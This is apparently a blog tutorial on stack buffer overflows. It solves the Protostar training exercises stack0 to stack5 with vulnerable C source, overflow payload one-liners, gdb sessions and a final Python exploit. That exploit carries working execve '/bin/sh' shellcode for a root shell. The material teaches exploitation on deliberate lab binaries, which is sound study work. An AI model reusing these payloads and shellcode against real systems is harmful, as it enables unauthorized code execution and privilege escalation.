What is a Buffer Overflow and How Hackers Exploit these Flaws part #2

6 Dec 2020

305.6K views

20-24 min read

Introduction

Buffer overflows are critical vulnerabilities that allow attackers to manipulate a program’s memory and execute arbitrary code. In this article, we’ll explore the intricacies of buffer overflow attacks, understand their impact, and learn how hackers exploit these flaws.

In our previous article we talked about the RAM operating principle and some other points essential to understanding the mechanism of an operating system. We have also seen how to exploit in theory "Buffer Overflow" vulnerability. In this new article, we will move on some more concrete examples.

Memory Exploitation Practice
How to Execute our Shellcode?
- Example of Exploitation
Conclusion

Memory Exploitation Practice

To use what we learned in the last article, we will try together to solve some of the the exercises of Protostar available on Exploit-Education website. We are going to work on the first 4 exercises which are:

Getting Started with Protostar

Before moving further, we are going to install Protostar on a virtual machine. You don't have to worry, this can be done in a few minutes and in a very simple way. We will start by going to the download section of Exploit-Education site and get a copy of the latest ISO version of Protostar. For those who don't want to waste their time searching, here is the link.

Once you are done, fire-up your Virtualbox and follow step by step the below bundle of 9 screenshots to install Protostar on your VirtualBox.

First Exercise "Stack Zero"

This exercise illustrates how the stack variables are arranged and demonstrates the possibility of modifying outside the allocated memory in order to alter the execution of the program. Take as example the below code for this first exercise:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    modified = 0;
    gets(buffer);

    if(modified != 0) {
        printf("you have changed the 'modified' variable\n");
    } else {
        printf("Try again?\n");
    }
}

As you can see, we do not interact with the modified variable. Therefore the question is how to change this value? First, let's see what the stack contains at this precise moment:

[buffer (64 bytes)] [modified (4 bytes)] [saved ebp] [saved eip]

Since the gets() function does not check the size of our string, we have to ask ourselves where are the characters going if we exceed 64 bytes? The answer is simple, they go into what is next in the stack, so basically, they are added to the modified variable. We can, therefore, change this variable and validate the challenge. Our final payload to validate this challenge will therefore be:

cd /opt/protostar/bin/
python -c "print 'A' * 65" | ./stack0
you have changed the 'modified' variable

Perfect! You just made your first exploitation of a Stack Overflow! How do you feel?

Second Exercise "Stack One"

Well, let's move now on to the second exercise. Through the following example, we will understand even better the modification of the variables in the program, and how the variables are arranged in memory.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    if(argc == 1) {
        errx(1, "please specify an argument\n");
    }

    modified = 0;
    strcpy(buffer, argv[1]);

    if(modified == 0x61626364) {
        printf("you have correctly got the variable to the right value\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}

If we decompose the above code, we can see that the program requires an arguments argv [1]. Concretely what does this mean? I'm almost sure that you have already seen many times that such thing when you execute a program from your terminal. In some case, you must pass the arguments in your command line such as ./prog arg1 arg2 arg3 etc ....

In our case, argv [1] simply corresponds to arg1. So we have found a stack overflow at the strcpy() because that function doesn't check the size of our argv. But the difficulty this time is to put 0x61626364 in our modified variable. To do so, we must put the 64 "A" padding to fill the buffer then we put 0x61626364 like this:

cd /opt/protostar/bin/
./stack1 $(python -c "print 'A' * 64 + '\x64\x63\x62\x61'")
you have correctly got the variable to the right value

Third Exercise "Stack Two"

Before moving on the explanation, please take a few minutes to analyze properly the below code.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];
    char * variable;

    variable = getenv("GREENIE");

    if(variable == NULL) {
        errx(1, "please set the GREENIE environment variable\n");
    }

    modified = 0;

    strcpy(buffer, variable);

    if(modified == 0x0d0a0d0a) {
        printf("you have correctly modified the variable\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}

This exercise is very similar to the one before but carries a certain nuance. Let's look at the documentation for the getenv() function if you don't know about it. This function searches the environment variable list for a variable named name, and returns a pointer to the corresponding string value. In the above case, our program is vulnerable at the line:

strcpy (buffer, variable);

Do you know why? Following this code, our program retrieves what our environment variable "GREENIE" contains and puts everything in buffer without checking the size. So let's exploit this using the below schema.

GREENIE = [PADDING OF 64] [0x0d0a0d0a]

cd /opt/protostar/bin/
GREENIE=$(python -c "print 'A' * 64 + '\x0a\x0d\x0a\x0d'")
export GREENIE
echo $GREENIE
./stack2

Fourth Exercise "Stack Three"

This exercise will be the last one we will see in this article, here is the code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (* fp)();
    char buffer[64];

    fp = 0;

    gets(buffer);

    if(fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }
}

In the above code, we can clearly understand that the vulnerability occurs when the gets() function is used. We will examine what the stack looks like in this case:

[buffer 64][fp][saved ebp][saved eip]

What we see here is that fp in this case is a pointer of a function and the program will jump to what fp contains. So what we need to move on is just make sure we have the address of win in the fp variable.

cd /opt/protostar/bin
objdump -d stack3 | grep "win"

Using the above command we can find that win is at address "0x08048424". So here is our final payload:

python -c "print 'A' * 64 + '\x24\x84\x04\x08'" | ./stack3

Fifth Exercise "Stack Four"

In this new exercise we will see together how a buffer overflow can change code execution even when there's no variable to overwrite. First let's see the source code of our challenge:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);
}

We will now target the return address of the main eip function. This address is stored on the stack at the beginning of the frame. The main point now is to find out how far we will have to go to overflow this variable. In order to do it, we will try to overflowing the buffer and increase the value until we get a segmentation error message.

cd /opt/protostar/bin
(python -c "print 'A' * 64") | ./stack4
(python -c "print 'A' * 68") | ./stack4
(python -c "print 'A' * 72") | ./stack4
(python -c "print 'A' * 76") | ./stack4

We did increase by 4 each time and we got the "Segmentation fault" error message when we did try to put a string of 76 characters. Considering this, we can say that after 76 bytes is the area that overwrites eip, so we will need 76 "A" and the address of win in Little Endian:

cd /opt/protostar/bin
objdump -x stack4 | grep "win"

Now that we got the win address, we just need to use Python to print 76 "A" then the address in Little Endian as the below example:

(python -c "print 'A' * 76 + '\xf4\x83\x04\x08'") | ./stack4

How to Execute our Shellcode?

You remember by rewriting saved rip, we could redirect our execution flow anywhere in the memory. If we want to use a Shellcode, the principle is the same except we will redirect the flow to our Shellcode to be able to execute it. The main question is where to put our Shellcode? Well if you remember what we have seen previously, the Shellcode can be put on the stack or in an environment variable.

Placing a Shellcode in the buffer

[[shellcode][padding]][saved ebp][saved eip -> the address to our shellcode]

Placing a Shellcode behind eip

[buffer (padding)][saved ebp][saved eip -> the address of the nop][nop * large number][shellcode]

What is nop? Do you remember our first article. If you already forgot, I kindly suggest you have a look at what we already have seen during our first approach. To cut short, "nop = No Operation", which concretely means to don't do anything and simply move to the next instruction.

How useful is this, you would say? This allows us to have the addresses that go right to the following instructions and finally to the Shellcode, so we no longer have to take the precise address of our Shellcode but just an address in our nop.

Example of Exploitation

It's now the time to move on the concrete aspect of the exploitation and to do this we will use the challenge "stack5" from the Exploit-Education website which contains several exercises regarding binary exploitation. Here is the code that we will use:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);
}

How and where to Get Started?

In the above source code, we can see a buffer of 64-bytes is created and the function gets() is called. What we must do is overflow the buffer by rewriting the return address pointing to our Shellcode. Suppose we do not have the source code, we are going to disassemble main using gdb. This will allow us among other things to find the address of the buffer where our Shellcode will be placed.

cd /opt/protostar/bin
gdb -q stack5
Reading symbols from /opt/protostar/bin/stack5...done.
(gdb) disas main

Now we are going to put a breakpoint into the main() function to stop the execution of the program and examine what is on the stack.

(gdb) b * 0x080483da
Breakpoint 1 at 0x80483da: file stack5/stack5.c, line 11.

Through r and i r for "info registers" we can get a complete overview and analyze the registers. So let's run it and check what we get. The eax value must contain the string that we have entered "ABCDEF" and therefore the beginning of the buffer is 0xbffffc70.

(gdb) x/s 0xbffffc70
0xbffffc70:     "ABCDEF"

Since the stack esp register points to 0xbffffcbc then we can calculate the length of our padding using the following command:

(gdb) p/d 0xbffffcbc - 0xbffffc70
$1 = 76

We can determinate that our filler length is equal to 76 and since we got it, we can overwrite the return address. In order to do it, open a new terminal and execute the following python command in order to get the complete string:

python -c "print 'A' * 76 + 'B' * 4"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

The complete string in your clipboard and back the terminal where your instance of gdb is running and past the string after executing the r command as per the following:

(gdb) r
Starting program: /opt/protostar/bin/stack5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, 0x080483da in main (argc=Cannot access memory at address 0x41414149
) at stack5/stack5.c:11
11      stack5/stack5.c: No such file or directory.
        in stack5/stack5.c

Once you are done, simply execute the following command to check if the value of your stack esp register has been updated:

(gdb) x/s 0xbffffcbc
0xbffffcbc:      "BBBB"

As you can see the content of 0xbffffcbc is now "BBBB", so we can already handle the return address. The return address should be "0xbffffcbc + 4" which is equal to 0xbffffcc0. If you want to be sure that address is already present in the stack simply execute the following command in the terminal that running your gdb instance:

(gdb) x/60wx $eax

Now we are going to create an exploit to verify that we will be able to execute arbitrary code, for this we will use the Interrupt 3 instruction in order to stop the execution of the program and create a breakpoint.

cat >> /tmp/exploit.py << EOL
import struct

def m32(dir):
    return struct.pack("I",dir)

padding="A"*76
ret=m32(0xbffffcc0)
nops="\x90"*20 # NOPs
shellcode="\xCC"*4
print padding+ret+nops+shellcode
EOL

python /tmp/exploit.py > /tmp/file
cd /opt/protostar/bin/
./stack5 < /tmp/file

We see that it works, now we are going to try to execute a shell /bin/sh as root. We can generate the Shellcode using msfvenom or search for one that works in our situation on Shell Storm website. To make it easier for you, I already selected a Shellcode that you can use in this situation and which can be found here. So considering all of this our final payload will be:

import struct

def m32(dir):
    return struct.pack("I",dir)

padding="A"*76
ret=m32(0xbffffcc0)
nops="\x90"*20
shellcode = ""
shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89"
shellcode += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
shellcode += "\xcd\x80\x31\xc0\x40\xcd\x80"

print padding+ret+nops+shellcode

The final step will be to save the above piece of code in a file that I will personally name "exploit.py" and execute it using the below command:

(python /tmp/exploit.py;cat) | ./stack5

We can now execute commands as root on the system. As I said before, these challenges are an introduction, nowadays binaries have protection, such as NX for Linux or DEP for Windows, which makes some memory areas (usually the stack) not executable. However, understand theses principles is a good start if you want to involve deeper into the Buffer Overflow.

Conclusion

In conclusion, mastering buffer overflow exploitation is essential for both offensive and defensive security professionals. By understanding the underlying mechanisms and techniques, we can better protect systems and applications from potential threats.

For more information about this tutorial and to see a live demonstration of this type of attack, I encourage you to watch the video below.